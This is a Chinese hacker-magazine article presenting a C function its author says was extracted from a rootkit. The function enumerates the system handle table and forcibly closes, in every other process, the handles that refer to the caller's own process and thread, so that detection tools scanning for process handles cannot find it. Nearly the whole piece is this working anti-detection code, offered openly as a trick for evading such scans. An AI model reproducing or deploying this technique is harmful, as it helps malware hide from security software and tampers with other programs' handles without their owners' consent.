抹掉所有進程中自己的句柄
作者:佚名
之前聽過一個檢測進程的想法,就是暴力枚舉所有進程中的handle,查找其中類型為PROCESS的. 此法也被爐子牛用于他的LzOpenProcess(). 下面我就寫了一斷代碼來對抗這個方法,純屬小伎倆,牛牛們飄過~
抹掉所有進程中自己的句柄
之前聽過一個檢測進程的想法,就是暴力枚舉所有進程中的handle,查找其中類型為PROCESS的.
此法也被爐子牛用于他的LzOpenProcess().
下面我就寫了一斷代碼來對抗這個方法,純屬小伎倆,牛牛們飄過~
嚴格說,此段代碼不算原創,是從某rootkit的bin中扒出來的,因此基本保留其原貌,經我修改測試,主要函數如下:
void CloseAllmyHandles()
{
HANDLE hCurProcess,hSouceProcessHandle,hTargetHandle;
HANDLE hMyProcess=INVALID_HANDLE_VALUE,hMyThread=INVALID_HANDLE_VALUE;
DWORD pid,nBufferLen=0x40000,nRetnLen=0;
DWORD HandleCnt,NumberOfHandles;
DWORD pMyProcessObject = 0,pMyThreadObject = 0,pObject;
CLIENT_ID myCid,tmpCid;
PVOID pBuffer = NULL;
NTSTATUS status;
OBJECT_ATTRIBUTES ObjectAttributes;
myCid.UniqueProcess =(HANDLE)my_GetProcessId();
myCid.UniqueThread=(HANDLE)my_GetThreadId();
InitializeObjectAttributes( &ObjectAttributes, NULL, 0, NULL, NULL );
ZwOpenProcess(&hMyProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid);
ZwOpenThread(&hMyThread, PROCESS_ALL_ACCESS, &ObjectAttributes, &myCid);
printf("hMyProcess:0x%08x\n",hMyProcess);
printf("hMyThread :0x%08x\n",hMyThread);
hCurProcess = GetCurrentProcess();
status=ZwAllocateVirtualMemory(hCurProcess, &pBuffer, 0, &nBufferLen, MEM_COMMIT,PAGE_READWRITE);
if (!NT_SUCCESS(status))
{
printf("Alloc Memory failed.\n");
return;
}
printf("Alloced Buffer:0x%08X\n",pBuffer);
ZwQuerySystemInformation(SystemHandleInformation, pBuffer, nBufferLen, &nRetnLen);// 16=SystemHandleInformation
printf("Searching handles...\n");
HandleCnt=*(DWORD *)pBuffer;
printf("Handle Count:%d\n",HandleCnt);
if (HandleCnt>1)
{
NumberOfHandles=*(DWORD*)pBuffer;
pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD));
do
{
//printf("HandleValue:0x%08X\n",pHandleInfo->HandleValue);
if ( pHandleInfo->HandleValue==(USHORT)hMyThread )
{
if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess )
{
pMyThreadObject = *(DWORD*)&(pHandleInfo->Object);
printf("Thread finded\n");
}
}
if (pHandleInfo->HandleValue==(USHORT)hMyProcess )
{
if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess)
{
pMyProcessObject =*(DWORD*)&(pHandleInfo->Object);
printf("Process finded\n");
}
}
++pHandleInfo;
--NumberOfHandles;
}
while ( NumberOfHandles );
}
ZwClose(hMyThread);
ZwClose(hMyProcess);
printf("Found my object ok.\nBegin Search and Close...\n");
NumberOfHandles=HandleCnt;
if (HandleCnt>=1 )
{
pHandleInfo=(PSYSTEM_HANDLE_TABLE_ENTRY_INFO)((char*)pBuffer+sizeof(DWORD));
do
{
pObject = *(DWORD*)&(pHandleInfo->Object);
if ( pMyProcessObject == pObject || pMyThreadObject == pObject )
{
printf("Found Handle=0x%08X OwnerPID=%4d\n",pHandleInfo->HandleValue,pHandleInfo->UniqueProcessId);
tmpCid.UniqueProcess= (HANDLE)pHandleInfo->UniqueProcessId;
tmpCid.UniqueThread=0;
InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL );
status=ZwOpenProcess(&hSouceProcessHandle, PROCESS_DUP_HANDLE, &ObjectAttributes, &tmpCid);
//PrintZwError("ZwOpenProcess",status);
if (!status)
{
status=ZwDuplicateObject(
hSouceProcessHandle,
(void*)pHandleInfo->HandleValue,
hCurProcess,
&hTargetHandle,
0,
0,
DUPLICATE_CLOSE_SOURCE);
if ( !status)
{
ZwClose(hTargetHandle);
printf("Handle closed!\n");
}
//PrintZwError("ZwDuplicateObject",status);
ZwClose(hSouceProcessHandle);
}
}
++pHandleInfo;
--NumberOfHandles;
}
while ( NumberOfHandles );
}
ZwFreeVirtualMemory(hCurProcess, &pBuffer, &nBufferLen, MEM_RELEASE);
}
|
【編輯推薦】
責任編輯:安泉
來源:
黑客防線
